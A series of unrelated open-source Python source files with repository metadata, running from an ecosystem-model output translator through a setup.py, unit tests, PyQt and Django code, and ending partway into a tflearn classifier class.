    # Misc calcs from fluxes/state
    lma = shoot / lai
    ncon = shootn / shoot
    nflit = litternag + litternbg
    pflit = litterpag + litterpbg
    pcon = shootp / shoot
    recosys = rh + ra
    secp = inorgsorbp + inorgssorbp
    cw = stem + branch
    cwp = stemp + branchp
    gw = cpstem + cpbranch
    cwn = stemn + branchn
    cwin = deadstems + deadbranch
    ccrlin = deadcroots
    cfrlin = deadroots
    ndeadwood = deadbranchn + deadstemn
    pdeadwood = deadbranchp + deadstemp
    nwood_growth = npstemimm + npstemmob + npbranch
    pwood_growth = ppstemimm + ppstemmob + ppbranch
    # Keys must match setup_varnames(); anything absent is emitted as UNDEF
    # by translate_output() (e.g. NFIX, which G'DAY does not produce).
    return {'YEAR':year, 'DOY':doy, 'SW':pawater_root, 'SWPA':pawater_root,
            'NEP':nep, 'GPP':gpp, 'NPP':npp, 'CEX':cex, 'CVOC':cvoc,
            'RECO':recosys, 'RAU':ra, 'RL':rleaf, 'RW':rwood,
            'RCR':rcr, 'RFR':rfr,
            'RGR':rgrow, 'RHET':rh, 'RSOIL':rsoil, 'ET':et, 'T':trans,
            'ES':soil_evap, 'EC':can_evap, 'RO':runoff, 'DRAIN':drainage,
            'LE':lh, 'SH':sh, 'CL':shoot, 'CW':cw, 'CCR':coarse_root,
            'CFR':fine_root, 'CSTOR':tnc, 'CFLIT':litterc, 'CFLITA':littercag,
            'CFLITB':littercbg, 'CCLITB':ccoarse_lit, 'CSOIL':soilc,
            'CGL':gl, 'CGW':gw, 'CGCR':gcr, 'CGFR':gr, 'CREPR':grepr, 'CLITIN':deadleaves,
            'CCRLIN':ccrlin, 'CFRLIN':cfrlin, 'CWLIN':cwin, 'LAI':lai, 'LMA':lma, 'NCON':ncon,
            'NL':shootn, 'NW':cwn, 'NCR':coarse_rootn, 'NFR':rootn,
            'NSTOR':nstorage, 'NFLIT': nflit, 'NFLITA':litternag, 'NFLITB':litternbg, 'NCLITB':ndw,
            'NSOIL':nsoil, 'NPMIN':inorgn, 'NPORG':npoolo,
            'NGL':npleaf, 'NGW':nwood_growth, 'NGCR':npcroot, 'NGFR':nproot,
            'NLITIN':deadleafn, 'NCRLIN':deadcrootn,
            'NFRLIN':deadrootn, 'NWLIN':ndeadwood, 'NUP':nup,
            'NGMIN':ngross, 'NMIN':nmin, 'NVOL': nvol, 'NLEACH':nleach,
            'NLRETR':cfretransn, 'NWRETR':cwretransn,
            'NCRRETR':ccrretransn, 'NFRRETR':cfrretransn,
            # BUG FIX: key was 'Gbd' but setup_varnames() uses 'GBd'.
            'APARd':apar, 'GCd':gcd, 'GAd':ga, 'GBd':gb, 'Betad':beta,
            'PL':shootp, 'PW':cwp,
            'PCR':crootp, 'PFR':rootp,
            'PSTOR':pstorage, 'PFLIT':pflit,
            'PFLITA':litterpag, 'PFLITB':litterpbg, 'PCLITB':pclitb,
            'PSOIL':psoil, 'PLAB':inorglabp,
            'PSEC':secp, 'POCC':inorgoccp,
            'PPAR':inorgparp,
            'PPMIN':inorgp, 'PPORG':ppoolo,
            'PLITIN':deadleafp, 'PCRLIN':deadcrootp,
            'PFRLIN':deadrootp, 'PWLIN':pdeadwood, 'PUP':pup,
            'PGMIN':pgross, 'PMIN':pmin, 'PLEACH':pleach,
            'PGL':ppleaf, 'PGW':pwood_growth, 'PGCR':ppcroot, 'PGFR':pproot,
            # BUG FIX: 'PCRRETR' was written as a second 'PFRRETR' key,
            # which silently dropped the coarse-root entry from the dict.
            'PLRETR':cfretransp, 'PWRETR':pwretr, 'PCRRETR':pcrretr, 'PFRRETR':pfrretr,
            'CTOACTIVE':c_into_active, 'CTOSLOW':c_into_slow,
            'CTOPASSIVE':c_into_passive, 'CACTIVETOSLOW':active_to_slow,
            'CACTIVETOPASSIVE':active_to_passive, 'CSLOWTOACTIVE':slow_to_active,
            'CSLOWTOPASSIVE':slow_to_passive, 'CPASSIVETOACTIVE':passive_to_active,
            'CACTIVE':activesoil, 'CSLOW':slowsoil, 'CPASSIVE':passivesoil,
            'CO2SLITSURF':co2_rel_from_surf_struct_litter,
            'CO2SLITSOIL':co2_rel_from_soil_struct_litter,
            'CO2MLITSURF':co2_rel_from_surf_metab_litter,
            'CO2MLITSOIL':co2_rel_from_soil_metab_litter,
            'CO2FSOM':co2_rel_from_active_pool,
            'CO2SSOM':co2_rel_from_slow_pool,
            'CO2PSOM':co2_rel_from_passive_pool,
            'TFACSOM':tfac_soil_decomp,
            'REXC':rexc,
            'REXN':rexn,
            'CO2X':co2x,
            'FACTIVE':factive,
            'RTSLOW':rtslow,
            'REXCUE':rexcue,
            'CSLO':cslo,
            'NSLO':nslo,
            'CACT':cact,
            'NACT':nact}, git_ver
def setup_units():
    """Return the units header row of the NCEAS csv, one entry per column.

    NOTE(review): this list must stay in lock-step with the two lists
    returned by setup_varnames(); there is no automated length check, so
    verify manually when adding or removing columns.
    """
    units = ['--','--','Mean ppm', 'mm d-1', 'mol m-2', 'Mean DegC', 'Mean DegC',
             'kPa h', 'mm', 'mm', 'gN m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
             'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
             'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
             'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1', 'kgH2O m-2 d-1',
             'kgH2O m-2 d-1', 'kgH2O m-2 d-1', 'kgH2O m-2 d-1',
             'kgH2O m-2 d-1', 'kgH2O m-2 d-1', 'MJ m-2', 'MJ m-2',
             'gC m-2', 'gC m-2', 'gC m-2', 'gC m-2', 'gC m-2', 'gC m-2',
             'gC m-2', 'gC m-2', 'gC m-2', 'gC m-2 0 to 30 cm',
             'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
             'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
             'gC m-2 d-1', 'm2 m-2', 'gC m-2',
             'gN gd.m.-1', 'gN m-2', 'gN m-2', 'gN m-2', 'gN m-2', 'gN m-2',
             'gN m-2', 'gN m-2', 'gN m-2', 'gN m-2', 'gN m-2 0 to 30 cm',
             'gN m-2 0 to 30 cm', 'gN m-2 0 to 30 cm', 'gN m-2 d-1',
             'gN m-2 d-1', 'gN m-2 d-1', 'gN m-2 d-1', 'gN m-2 d-1',
             'gN m-2 d-1', 'gN m-2 d-1', 'gN m-2 d-1', 'gN m-2 d-1',
             'gN m-2 d-1', 'gN m-2 d-1', 'gN m-2 d-1', 'gN m-2 d-1',
             'gN m-2 d-1', 'gN m-2 d-1', 'gN m-2 d-1',
             'gN m-2 d-1', 'gN m-2 d-1',
             'MJ m-2 d-1', 'mol H2O m-2 s-1', 'mol H2O m-2 s-1',
             'mol H2O m-2 s-1', 'frac',
             'gP m-2', 'gP m-2', 'gP m-2',
             'gP m-2', 'gP m-2', 'gP m-2',
             'gP m-2', 'gP m-2', 'gP m-2',
             'gP m-2', 'gP m-2',
             'gP m-2', 'gP m-2',
             'gP m-2', 'gP m-2',
             'gP m-2','gP m-2 d-1', 'gP m-2 d-1',
             'gP m-2 d-1','gP m-2 d-1', 'gP m-2 d-1',
             'gP m-2 d-1', 'gP m-2 d-1', 'gP m-2 d-1',
             'gP m-2 d-1', 'gP m-2 d-1', 'gP m-2 d-1', 'gP m-2 d-1',
             'gP m-2 d-1', 'gP m-2 d-1', 'gP m-2 d-1', 'gP m-2 d-1',
             'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
             'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
             'gC m-2', 'gC m-2', 'gC m-2',
             'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
             'gC m-2 d-1', 'gC m-2 d-1', 'gC m-2 d-1',
             'frac', 'gC m-2 d-1', 'gN m-2 d-1', 'gC m-2 d-1',
             'gC m-2 d-1', 'years', 'frac', 'gC m-2 d-1', 'gN m-2 d-1',
             'gC m-2 d-1', 'gN m-2 d-1']
    return units
def setup_varnames():
    """Return (long_descriptions, short_codes) for the NCEAS csv header.

    The two lists are positionally paired: entry i of `variable` is the
    human-readable description of short code `variable_names[i]`. The short
    codes are the keys looked up in the data dict produced by
    load_gday_output(); codes absent there (e.g. NFIX) are emitted as
    UNDEF by translate_output().
    """
    variable = ['Year', 'Day of the year', 'CO2', 'Precipitation', 'PAR',
                'Air temp canopy', 'Soil temp 10 cm', 'Vapour Pres Def',
                'Total soil water content', 'Plant available soil water content',
                'N deposition', 'Net Eco Prod',
                'Gross Prim Prod', 'Net Prim Prod', 'C exudation',
                'C VOC Flux', 'Resp ecosystem', 'Resp autotrophic',
                'Resp leaves (maint)', 'Resp Wood (maint)',
                'Resp coarse root (maint)',
                'Resp Fine Root (maint)', 'Resp growth',
                'Resp heterotrophic',
                'Evapotranspiration', 'Transpiration', 'Soil Evaporation',
                'Canopy evaporation', 'Runoff', 'Drainage', 'Latent Energy',
                'Sensible Heat', 'C Leaf Mass', 'C Wood Mass',
                'C Coarse Root mass', 'C Fine Root mass',
                'C Storage as TNC', 'C Fine Litter Total',
                'C Fine Litter above', 'C Fine Litter below',
                'C Coarse Litter', 'C Soil', 'C Leaf growth',
                'C Wood growth', 'C Coarse Root growth',
                'C Fine Root growth', 'C reproduction growth',
                'C Leaf Litterfall',
                'C Coarse Root litter inputs', 'C Fine Root litter inputs',
                'C Wood/branch inputs',
                'LAI projected', 'Leaf gC/leaf area', 'N Conc Leaves',
                'N Mass Leaves', 'N Mass Wood', 'N Mass Coarse Roots',
                'N Mass Fine Roots', 'N storage', 'N fine litter total', 'N litter aboveground',
                'N litter belowground', 'N Dead wood', 'N Soil Total',
                'N in Mineral form', 'N in Organic form', 'N fixation',
                'N Leaf growth', 'N Wood growth', 'N CR growth', 'N Fine Root growth',
                'N Leaf Litterfall',
                'N Coarse Root litter input', 'N Fine Root litter input',
                'N Wood/brch litterfall', 'N Biomass Uptake',
                'N Gross Mineralization', 'N Net mineralization',
                'N Volatilization', 'N Leaching',
                'Foliage retranslocation',
                'Wood/Branch retranslocation', 'Coarse Root retranslocation',
                'Fine Root retranslocation',
                'Aborbed PAR', 'Average daytime canopy conductance',
                'Average daytime aerodynamic conductance',
                'Average daytime leaf boundary conductance',
                'Soil moisture stress',
                'P Mass Leaves',
                'P Mass Wood', 'P Mass Coarse Roots', 'P Mass Fine Roots',
                'P storage', 'P litter total', 'P litter aboveground', 'P litter belowground',
                'P coarse litter',
                'P Soil Total', 'P in labile form',
                'P in secondary form',
                'P in occluded form', 'P parent pool',
                'P Inorganic pool',
                'P in Organic form','P Leaf Litterfall',
                'P Coarse Root litter input','P Fine Root litter input', 'P Wood/brch litterfall',
                'P Biomass Uptake',
                'P Gross Mineralisation', 'P Net mineralisation', 'P Leaching',
                'P Leaf growth', 'P Wood growth', 'P CR growth', 'P Fine Root growth',
                'P Foliage retranslocation',
                'P Wood/Branch retranslocation', 'P Coarse Root retranslocation',
                'P Fine Root retranslocation',
                'C fluxes from litter & slow/passive to active soil pool',
                'C fluxes from litter & active soil pool to slow pool',
                'C fluxes from active & slow soil pool to passive pool',
                'C flux from active soil pool to slow soil pool',
                'C flux from active soil pool to passive soil pool',
                'C flux from slow soil pool to active soil pool',
                'C flux from slow pool to passive soil pool',
                'C flux from passive pool to active pool',
                'C Active SOM pool',
                'C Slow SOM pool',
                'C Passive SOM pool',
                'CO2 efflux from surf structural litter',
                'CO2 efflux from soil structural litter',
                'CO2 efflux from surf metabolic litter',
                'CO2 efflux from soil metabolic litter',
                'CO2 efflux from fast SOM pool',
                'CO2 efflux from slow SOM pool',
                'CO2 efflux from passive SOM pool',
                'Temperature scalar on C efflux from SOM pools',
                'Root Exudation of C',
                'Root Exudation of N',
                'CO2 released from exudation',
                'Total C flux from the active pool',
                'Residence time of slow pool',
                'REXC carbon use efficiency',
                'Total C in the slow pool',
                'Total N in the slow pool',
                'Total C in the active pool',
                'Total N in the active pool']
    variable_names = ['YEAR', 'DOY', 'CO2', 'PREC', 'PAR', 'TAIR', 'TSOIL', 'VPD',
                      'SW', 'SWPA', 'NDEP', 'NEP', 'GPP', 'NPP', 'CEX', 'CVOC',
                      'RECO', 'RAU', 'RL', 'RW', 'RCR', 'RFR', 'RGR',
                      'RHET',
                      'ET', 'T', 'ES', 'EC', 'RO', 'DRAIN', 'LE', 'SH',
                      'CL', 'CW', 'CCR', 'CFR', 'CSTOR', 'CFLIT', 'CFLITA',
                      'CFLITB', 'CCLITB', 'CSOIL', 'CGL', 'CGW', 'CGCR', 'CGFR',
                      'CREPR','CLITIN', 'CCRLIN', 'CFRLIN','CWLIN', 'LAI',
                      'LMA', 'NCON', 'NL', 'NW', 'NCR', 'NFR', 'NSTOR',
                      'NFLIT', 'NFLITA','NFLITB', 'NCLITB', 'NSOIL', 'NPMIN', 'NPORG', 'NFIX',
                      'NGL', 'NGW', 'NGCR', 'NGFR',
                      'NLITIN', 'NCRLIN', 'NFRLIN','NWLIN', 'NUP', 'NGMIN', 'NMIN',
                      'NVOL', 'NLEACH', 'NLRETR', 'NWRETR',
                      'NCRRETR', 'NFRRETR', 'APARd',
                      'GCd', 'GAd', 'GBd', 'Betad',
                      'PL', 'PW',
                      'PCR', 'PFR','PSTOR',
                      'PFLIT', 'PFLITA', 'PFLITB', 'PCLITB',
                      'PSOIL', 'PLAB',
                      'PSEC', 'POCC',
                      'PPAR',
                      'PPMIN', 'PPORG',
                      'PLITIN', 'PCRLIN',
                      'PFRLIN', 'PWLIN', 'PUP',
                      'PGMIN', 'PMIN', 'PLEACH',
                      'PGL', 'PGW', 'PGCR', 'PGFR',
                      'PLRETR', 'PWRETR', 'PCRRETR', 'PFRRETR',
                      'CTOACTIVE', 'CTOSLOW', 'CTOPASSIVE', 'CACTIVETOSLOW',
                      'CACTIVETOPASSIVE', 'CSLOWTOACTIVE', 'CSLOWTOPASSIVE',
                      'CPASSIVETOACTIVE', 'CACTIVE', 'CSLOW', 'CPASSIVE',
                      'CO2SLITSURF', 'CO2SLITSOIL', 'CO2MLITSURF',
                      'CO2MLITSOIL', 'CO2FSOM', 'CO2SSOM', 'CO2PSOM',
                      'TFACSOM','REXC','REXN','CO2X','FACTIVE','RTSLOW','REXCUE',
                      'CSLO','NSLO','CACT','NACT']
    return variable, variable_names
if __name__ == "__main__":

    # Translate the example G'DAY output file in place.
    fname = "dk_fixco2_fixndep_forest_equilib.out"
    # met_fname = "duke_equilibrium_metdata_fixndep_0.004_fixco2_270.gin"
    translate_output(fname)
|
mingkaijiang/quasi_equil_analytical
|
GDAY/code/scripts/translate_GDAY_output_to_NCEAS_format.py
|
Python
|
gpl-3.0
| 26,132
|
import pandas
import numpy
import sys
import re

# Print the mean and standard deviation of the first column of an Excel
# sheet. Usage: python usingpandas.py filename.xlsx
filename = ""
if len(sys.argv) == 2:
    filename = sys.argv[1]
else:
    print("usage: ", sys.argv[0], " filename.xlsx")
    # BUG FIX: use sys.exit() -- the bare exit() builtin is injected by
    # the `site` module and is not guaranteed to exist in every
    # interpreter environment (e.g. when run with -S or frozen).
    sys.exit(1)

df = pandas.read_excel(filename)
cn = df.columns
print("CN: ", cn)

values = numpy.asarray(df[cn[0]].values)
# NOTE(review): numpy.std defaults to the population std-dev (ddof=0);
# confirm whether the sample std-dev (ddof=1) was intended.
print(numpy.mean(values), " ", numpy.std(values))
|
lstorchi/teaching
|
basictests/usingpandas.py
|
Python
|
gpl-3.0
| 345
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
import os
import glob
import sys
from distutils.core import setup
from distutils.cmd import Command
from distutils.command.build import build
from distutils.command.install import install
from src.constants import const
def clear():
    """Remove generated artefacts: .pyc files, editor backups, compiled
    message catalogs, generated ui modules, MANIFEST and lokalize dirs."""
    cleanup_commands = (
        "find ./ -iname '*.pyc' |xargs rm -rfv",
        "find ./ -iname '*~' |xargs rm -rfv",
        "find ./ -iname '*.mo' | xargs rm -rfv",
        "find ./ -iname 'ui_*.py' | xargs rm -rfv",
        "find ./ -iname 'MANIFEST' | xargs rm -rfv",
        "find ./ -iname 'lokalize-scripts' | xargs rm -rfv",
    )
    for command in cleanup_commands:
        os.system(command)
def msgUpdate():
    """Regenerate the gettext template and merge it into every .po file.

    Works inside the po/ directory, restores the cwd afterwards, then
    clears build junk. Requires intltool-update and msgmerge on PATH.
    """
    # Generate POT file
    os.chdir("po")
    os.system("/usr/bin/intltool-update -p")
    # intltool emits 'untitled.pot'; rename it to the project convention.
    os.system("mv untitled.pot source.pot")
    # Update PO files
    for item in os.listdir("."):
        if item.endswith(".po"):
            os.system("msgmerge -U %s source.pot" % (item) )
    os.chdir("..")
    clear()
def makeDirs(dir):
    """Create *dir* and any missing parents, silently ignoring failures
    (typically 'already exists')."""
    if not os.path.isdir(dir):
        try:
            os.makedirs(dir)
        except OSError:
            pass
class Build(build):
    """Custom distutils build step (Python 2 / PyQt4 project).

    Compiles Qt .ui/.qrc files, gettext catalogs and the .desktop
    launcher into ./build, and stages a bin stub. Shells out to pyuic4,
    pyrcc4, msgfmt and intltool-merge, which must be installed.
    """
    def run(self):
        # Clear source and build data
        libdir = "build/lib/%s" %const.APP_NAME
        clear()
        print os.system("/bin/rm -rf build")
        makeDirs(libdir)
        makeDirs("build/desktop")
        makeDirs("build/bin")
        makeDirs("build/locales")
        print "Build codes..."
        os.system("cp -Rv src/*.py %s" %libdir)
        # Collect UI files: each qt4/*.ui becomes lib/ui_<name>.py,
        # each qt4/*.qrc becomes lib/<name>_rc.py.
        print "Build ui..."
        for filename in glob.glob1("qt4", "*.ui"):
            print os.system("/usr/bin/pyuic4 -o %s/ui_%s.py qt4/%s" % (libdir, filename.split(".")[0], filename))
        for filename in glob.glob1("qt4", "*.qrc"):
            print os.system("/usr/bin/pyrcc4 -o %s/%s_rc.py qt4/%s" % (libdir, filename.split(".")[0], filename))
        # Compile each po/<lang>.po into build/locales/<lang>.mo.
        print "Build locales..."
        for filename in glob.glob1("po", "*.po"):
            lang = filename.rsplit(".", 1)[0]
            print os.system("msgfmt po/%s.po -o build/locales/%s.mo" % (lang, lang))
        print "Build .desktop file"
        print os.system("intltool-merge -d po addfiles/%s.desktop.in build/desktop/%s.desktop" %(const.APP_NAME, const.APP_NAME) )
        # The app's main module doubles as the executable bin stub.
        print "Build bin file"
        self.copy_file("src/%s.py" %const.APP_NAME, "build/bin/%s" %const.APP_NAME )
        self.copy_file("src/%s.py" %const.APP_NAME, "build/lib/" )
        print("\n\nYou can run %s by this command; \n python build/lib/%s.py" %(const.APP_NAME, const.APP_NAME))
class Install(install):
    """Custom distutils install command (Python 2): copies the artifacts
    produced by Build into bin/lib/locale/doc/icon/desktop locations under
    self.root (supports DESTDIR-style staged installs)."""
    def run(self):
        print os.system("/bin/rm -rf install")
        # Target directories, all resolved relative to the install root.
        bin_dir = os.path.join(self.root, "usr/bin")
        lib_dir = os.path.join(self.root, self.install_libbase, const.APP_NAME)
        locale_dir = os.path.join(self.root, "usr/share/locale")
        doc_dir = os.path.join(self.root, "usr/share/doc/%s" %const.APP_NAME)
        icon_dir = os.path.join(self.root, "usr/share/pixmaps")
        apps_dir = os.path.join(self.root, "usr/share/applications")
        # Make directories
        print "Making directories..."
        makeDirs(bin_dir)
        makeDirs(lib_dir)
        makeDirs(locale_dir)
        makeDirs(doc_dir)
        makeDirs(icon_dir)
        makeDirs(apps_dir)
        # Install desktop files
        print "Installing desktop and icon files..."
        try:
            self.copy_file("build/desktop/%s.desktop" %const.APP_NAME, "%s" %apps_dir)
            self.copy_file("qt4/%s.png" %const.APP_NAME, "%s" %icon_dir)
        # NOTE(review): bare except silently ignores any copy failure here.
        except:
            pass
        # Install locales
        print "Installing locales..."
        # Each build/locales/<lang>.mo goes to
        # <locale_dir>/<lang>/LC_MESSAGES/<APP_NAME>.mo.
        for filename in glob.glob1("build/locales", "*.mo"):
            lang = filename.rsplit(".", 1)[0]
            try:
                os.makedirs(os.path.join(locale_dir, "%s/LC_MESSAGES" %lang))
            except OSError:
                pass
            self.copy_file("build/locales/%s.mo" % lang, os.path.join(locale_dir, "%s/LC_MESSAGES" %lang, "%s.mo" %const.APP_NAME))
        # Install Docs
        for filename in ["README", "COPYING", "AUTHORS", "ChangeLog"]:
            self.copy_file(filename, os.path.join(doc_dir) )
        print "Installing bin file"
        self.copy_file("build/bin/%s" %const.APP_NAME, "%s/%s" %(bin_dir,const.APP_NAME) )
        # rwxr-xr-x (Python 2 octal literal)
        os.chmod("%s/%s" %(bin_dir,const.APP_NAME), 0755)
        # Install Libraries
        print "Installing libraries... "
        print os.system("cp -v build/lib/%s/* %s" %(const.APP_NAME, lib_dir) )
# Command-line shortcuts handled before distutils takes over:
#  "msgupdate" regenerates/merges the translation files, "clear" removes
#  generated files; both exit immediately afterwards.
if "msgupdate" in sys.argv:
    msgUpdate()
    sys.exit(0)
if "clear" in sys.argv:
    clear()
    sys.exit(0)
# Standard distutils entry point; metadata comes from src.constants.const,
# and the customized Build/Install commands above are plugged in.
setup(
    name = const.APP_NAME,
    version = const.VERSION,
    license = "GPLv3",
    author = const.DEVELOPERS,
    url = const.WEBPAGE,
    packages = ["src"],
    data_files = [],
    cmdclass = {
        'build': Build,
        'install': Install
    }
)
|
alierkanimrek/pog
|
setup.py
|
Python
|
gpl-3.0
| 5,009
|
from nose.tools import eq_
from pyculiarity import detect_ts, detect_vec
from unittest import TestCase
import pandas as pd
import os
class TestVec(TestCase):
    """Regression tests for pyculiarity's detect_vec on the bundled
    raw_data.csv fixture (expected anomaly counts are pinned)."""

    def setUp(self):
        here = os.path.dirname(os.path.realpath(__file__))
        self.path = here
        csv_path = os.path.join(here, 'raw_data.csv')
        self.raw_data = pd.read_csv(csv_path, usecols=['timestamp', 'count'])

    def test_both_directions_with_plot(self):
        series = self.raw_data.iloc[:, 1]
        results = detect_vec(series, max_anoms=0.02, direction='both',
                             period=1440, only_last=True, plot=False)
        anoms = results['anoms']
        eq_(len(anoms.columns), 2)
        eq_(len(anoms.iloc[:, 1]), 25)

    def test_both_directions_e_value_longterm(self):
        series = self.raw_data.iloc[:, 1]
        results = detect_vec(series, max_anoms=0.02, direction='both',
                             period=1440, longterm_period=1440 * 14,
                             e_value=True)
        anoms = results['anoms']
        eq_(len(anoms.columns), 3)
        eq_(len(anoms.iloc[:, 1]), 131)

    def test_both_directions_e_value_threshold_med_max(self):
        series = self.raw_data.iloc[:, 1]
        results = detect_vec(series, max_anoms=0.02, direction='both',
                             period=1440, threshold="med_max", e_value=True)
        anoms = results['anoms']
        eq_(len(anoms.columns), 3)
        eq_(len(anoms.iloc[:, 1]), 6)
|
nicolasmiller/pyculiarity
|
tests/test_vec.py
|
Python
|
gpl-3.0
| 1,514
|
#!/usr/bin/env python
# vim: set fileencoding=UTF-8 :
import data_convertor_ui
from data_convertor_ui import _translate
from PyQt4 import QtGui, QtCore
import sys, os, czelta,locale
# Locate the directory this script lives in; __file__ is undefined in some
# execution contexts (e.g. interactive), so fall back to the current dir.
try:
    path = os.path.dirname(__file__)
except NameError:
    path = ""
# Ensure `path` ends with a separator so it can simply be prefixed to
# resource file names below.
path = path+os.sep if path!="" else ""
# Default UI language: two-letter code from the system locale.
sys_lang = locale.getdefaultlocale()[0][:2]
# Allow overriding the language on the command line with "-lang <code>".
for i in range(len(sys.argv)):
    if sys.argv[i]=="-lang":
        sys_lang = sys.argv[i+1]
class MainWindow(data_convertor_ui.Ui_MainWindow):
    """Controller for the generated Ui_MainWindow: lets the user pick a
    CZELTA shower data file, apply filters and convert it to .dat/.txt."""
    def select_data(self):
        """Ask the user for an input data file and show its path in the UI."""
        fname = str(QtGui.QFileDialog.getOpenFileName(self.mainwindow, 'Open file',
            self.last_directory if self.last_directory else os.path.expanduser('~'),"Shower data (*.dat *.txt)"))
        if fname=='':
            # Dialog was cancelled.
            return
        self.last_directory = os.path.dirname(fname)
        self.path_data.setText(fname)
    def convert_data(self):
        """Load the selected file, apply the checked filters and save the
        result in the format chosen via the radio buttons."""
        format = "dat" if self.radio_dat_file.isChecked() else "txt"
        fname = QtGui.QFileDialog.getSaveFileName(self.mainwindow, 'Save file', self.last_directory, "Shower data (*.%s)"%format)
        if fname=='':
            return
        # Make sure the output name carries a known suffix.
        if not fname[-4:] in (".txt",".dat"):
            fname += "."+format
        event_reader = czelta.event_reader()
        event_reader.load(str(self.path_data.displayText()))
        # Apply only the filters ticked in the UI.
        if self.filter_calibrations.isChecked():
            event_reader.filter_calibrations()
        if self.filter_maximum_TDC.isChecked():
            event_reader.filter_maximum_TDC()
        if self.filter_maximum_ADC.isChecked():
            event_reader.filter_maximum_ADC()
        if self.filter_minimum_ADC.isChecked():
            event_reader.filter_minimum_ADC()
        try:
            # save() returning a truthy value is treated as a failure.
            if event_reader.save(str(fname), not self.filter_x_events.isChecked()):
                raise IOError
        except IOError:
            QtGui.QMessageBox.warning(self.mainwindow,
                _translate("MainWindow", "error_title", None),
                _translate("MainWindow", "error_cant_save", None))
            return
        except NotImplementedError:
            QtGui.QMessageBox.warning(self.mainwindow,
                _translate("MainWindow", "error_title", None),
                _translate("MainWindow", "error_cant_save_bad_suffix", None))
            return
        QtGui.QMessageBox.information(self.mainwindow,
            _translate("MainWindow", "success", None),
            _translate("MainWindow", "file_saved", None))
    def __init__(self):
        self.last_directory = None
        self.mainwindow = QtGui.QMainWindow()
        self.setupUi(self.mainwindow)
        self.mainwindow.show()
        self.statusBar.showMessage(u"© 2014 Martin Quarda")
        # Old-style PyQt4 signal/slot connections.
        QtCore.QObject.connect(self.button_select_data, QtCore.SIGNAL('clicked()'), self.select_data)
        QtCore.QObject.connect(self.button_convert, QtCore.SIGNAL('clicked()'), self.convert_data)
        # The x-events filter is only meaningful for txt output, so its
        # enabled state follows the txt radio button.
        QtCore.QObject.connect(self.radio_txt_file, QtCore.SIGNAL('toggled(bool)'), self.filter_x_events.setEnabled)
def main():
    """Create the Qt application, install the translation catalogue for the
    detected (or overridden) language and run the main window event loop."""
    application = QtGui.QApplication(sys.argv)
    translator = QtCore.QTranslator()
    # Prefer the language-specific catalogue; fall back to English.
    if not translator.load("%sdata_convertor_%s.qm" % (path, sys_lang)):
        translator.load("%sdata_convertor_en.qm" % path)
    application.installTranslator(translator)
    window = MainWindow()  # keep a reference so the window is not collected
    sys.exit(application.exec_())
if __name__ == "__main__":
    main()
|
Hinogary/czelta-python
|
miniaplications/data_convertor.py
|
Python
|
gpl-3.0
| 3,370
|
from django.contrib.auth.decorators import login_required, \
permission_required
from django.views.decorators.debug import sensitive_post_parameters
from .migration import do_migration, \
openid_migration_method, \
confirm_migration
@sensitive_post_parameters('password')
@permission_required('openid_migration.add_openidusermigration')
@login_required()
def migrate_accounts(request):
    '''
    Manage user migration using AJAX.

    POST requests are dispatched on the "operation" field; any other
    request (or unknown operation) renders the migration method page.
    '''
    if request.method == 'POST':
        handlers = {
            'addAuth': confirm_migration,
            'migrateAccount': do_migration,
        }
        operation = request.POST['operation']
        if operation in handlers:
            return handlers[operation](request)
    return openid_migration_method(request)
|
wettenhj/mytardis
|
tardis/apps/openid_migration/views.py
|
Python
|
gpl-3.0
| 743
|
'''
Supernode wrapper
'''
from cmn.n2n_process import N2NProcess
from server.supernodep import SupernodeParams
class Supernode(N2NProcess):
    """Process wrapper for the n2n supernode executable."""

    # Name of the executable to launch.
    PATH = "supernode"

    def __init__(self, ip_str):
        # NOTE(review): `ip_str` is currently unused -- kept for interface
        # compatibility; confirm whether it should configure the params.
        N2NProcess.__init__(self)
        params = SupernodeParams()
        # Run in the foreground (presumably so this wrapper keeps control
        # of the child process -- confirm).
        params.foreground.setValue(True)
        self.params = params
|
lukablurr/n2nsim
|
src/server/supernode.py
|
Python
|
gpl-3.0
| 330
|
import main
import time
import tflearn
import numpy as np
import pandas as pd
import tensorflow as tf
from tflearn.callbacks import Callback
from sklearn.metrics import accuracy_score
from sklearn.metrics import classification_report
from keras.layers.local import LocallyConnected2D
class MonitorCallback(Callback):
    """tflearn training callback that writes per-epoch and end-of-training
    progress lines to the run log via main.log().

    :param args: parsed CLI/config namespace (must expose model_name)
    :param start_time: time.clock() value taken at run start, used to
        report elapsed wall time
    """

    def __init__(self, args, start_time):
        # Fix: name the base class explicitly. `super(self.__class__, self)`
        # recurses infinitely as soon as this class is subclassed, because
        # self.__class__ is then the subclass, not MonitorCallback.
        super(MonitorCallback, self).__init__()
        self.args = args
        self.start = start_time
        self.log = args.model_name

    def on_epoch_end(self, state):
        # One line per epoch: elapsed seconds, epoch number, loss, accuracy.
        main.log(self.args, '{:.5f}s Epoch '.format(time.clock() - self.start) + str(state.epoch).zfill(4) + ' Loss = {:.5f}'.format(state.global_loss) + ' Accuracy = {:.5}'.format(state.acc_value))

    def on_train_end(self, state):
        # Final validation metrics after training completes.
        main.log(self.args, '\n{:.5f}s'.format(time.clock() - self.start) + ' Validation Loss = {:.5f}'.format(state.val_loss) + ' Validation Accuracy = ' + str(state.val_acc))
class Classifier:
    """CNN classifier built on tflearn.

    Three topologies are supported via the `model` argument of
    build_network: 'DeepFace', 'Song', or (default) a small two-block
    inception-style network. Training/evaluation results are written to
    the run log via main.log()."""
    def __init__(self, args, start_time, num_classes, save_path, input_shape, scope_name, model):
        # Start from a fresh TF graph for every classifier instance.
        tf.reset_default_graph()
        self.args = args
        self.scope_name = scope_name
        self.start_time = start_time
        # NOTE(review): the `save_path` parameter is ignored; the path is
        # rebuilt from args + scope_name -- confirm this is intended.
        self.save_path = self.args.resource_dir + self.args.model_name + self.scope_name
        network = self.build_network(num_classes, input_shape, model)
